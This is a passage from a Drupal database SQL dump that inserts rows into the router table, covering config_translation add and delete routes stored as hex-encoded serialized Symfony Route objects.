73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35313a222f61646d696e2f636f6e6669672f7365617263682f70616765732f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.add.entity.shortcut_set.edit_form', '/admin/config/user-interface/shortcut/manage/{shortcut_set}/translate/{langcode}/add', '/admin/config/user-interface/shortcut/manage/%/translate/%/add', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38343a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f7b73686f72746375745f7365747d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31323a2273686f72746375745f736574223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a2273686f72746375745f736574223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a73686f72746375745f736574223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a2273686f72746375745f736574223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131323a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e746572666163652f73686f72746375742f6d616e6167652f283f503c73686f72746375745f7365743e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a2273686f72746375745f736574223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a34343a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a2273686f72746375745f736574223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36323a222f61646d696e2f636f6e6669672f757365722d696e746572666163652f73686f72746375742f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.add.entity.taxonomy_vocabulary.edit_form', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/translate/{langcode}/add', '/admin/structure/taxonomy/manage/%/translate/%/add', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37393a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31393a227461786f6e6f6d795f766f636162756c617279223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31393a227461786f6e6f6d795f766f636162756c617279223b613a323a7b733a343a2274797065223b733a32363a22656e746974793a7461786f6e6f6d795f766f636162756c617279223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130363a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35303a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.add.entity.user.admin_form', '/admin/config/people/accounts/translate/{langcode}/add', '/admin/config/people/accounts/translate/%/add', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35343a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a32323a22656e746974792e757365722e61646d696e5f666f726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37313a227b5e2f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34353a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('config_translation.item.add.entity.user_role.edit_form', '/admin/people/roles/manage/{user_role}/translate/{langcode}/add', '/admin/people/roles/manage/%/translate/%/add', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36333a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f7b757365725f726f6c657d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a393a22757365725f726f6c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a393a22757365725f726f6c65223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a757365725f726f6c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a393a22757365725f726f6c65223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39303a227b5e2f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f283f503c757365725f726f6c653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a22757365725f726f6c65223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f70656f706c652f726f6c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a393a22757365725f726f6c65223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34343a222f61646d696e2f70656f706c652f726f6c65732f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.add.entity.view.edit_form', '/admin/structure/views/view/{view}/translate/{langcode}/add', '/admin/structure/views/view/%/translate/%/add', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35393a222f61646d696e2f7374727563747572652f76696577732f766965772f7b766965777d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a343a2276696577223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a2276696577223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a76696577223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a2276696577223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38363a227b5e2f61646d696e2f7374727563747572652f76696577732f766965772f283f503c766965773e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a2276696577223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32373a222f61646d696e2f7374727563747572652f76696577732f76696577223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a343a2276696577223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34353a222f61646d696e2f7374727563747572652f76696577732f766965772f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a383b7d7d, 8);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('config_translation.item.add.system.rss_feeds_settings', '/admin/config/services/rss-publishing/translate/{langcode}/add', '/admin/config/services/rss-publishing/translate/%/add', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36323a222f61646d696e2f636f6e6669672f73657276696365732f7273732d7075626c697368696e672f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a32353a2273797374656d2e7273735f66656564735f73657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38303a227b5e2f61646d696e2f636f6e6669672f73657276696365732f7273735c2d7075626c697368696e672f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34373a222f61646d696e2f636f6e6669672f73657276696365732f7273732d7075626c697368696e672f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35333a222f61646d696e2f636f6e6669672f73657276696365732f7273732d7075626c697368696e672f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('config_translation.item.add.system.site_information_settings', '/admin/config/system/site-information/translate/{langcode}/add', '/admin/config/system/site-information/translate/%/add', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36323a222f61646d696e2f636f6e6669672f73797374656d2f736974652d696e666f726d6174696f6e2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a33323a2273797374656d2e736974655f696e666f726d6174696f6e5f73657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38303a227b5e2f61646d696e2f636f6e6669672f73797374656d2f736974655c2d696e666f726d6174696f6e2f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34373a222f61646d696e2f636f6e6669672f73797374656d2f736974652d696e666f726d6174696f6e2f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35333a222f61646d696e2f636f6e6669672f73797374656d2f736974652d696e666f726d6174696f6e2f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('config_translation.item.add.system.site_maintenance_mode', '/admin/config/development/maintenance/translate/{langcode}/add', '/admin/config/development/maintenance/translate/%/add', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36323a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f6d61696e74656e616e63652f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a32383a2273797374656d2e736974655f6d61696e74656e616e63655f6d6f6465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37393a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f6d61696e74656e616e63652f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a34373a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f6d61696e74656e616e63652f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35333a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f6d61696e74656e616e63652f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('config_translation.item.delete.captcha_settings', '/admin/config/people/captcha/translate/{langcode}/delete', '/admin/config/people/captcha/translate/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35363a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31363a22636170746368612e73657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37333a227b5e2f61646d696e2f636f6e6669672f70656f706c652f636170746368612f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33383a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34373a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('config_translation.item.delete.entity.block.edit_form', '/admin/structure/block/manage/{block}/translate/{langcode}/delete', '/admin/structure/block/manage/%/translate/%/delete', 245, 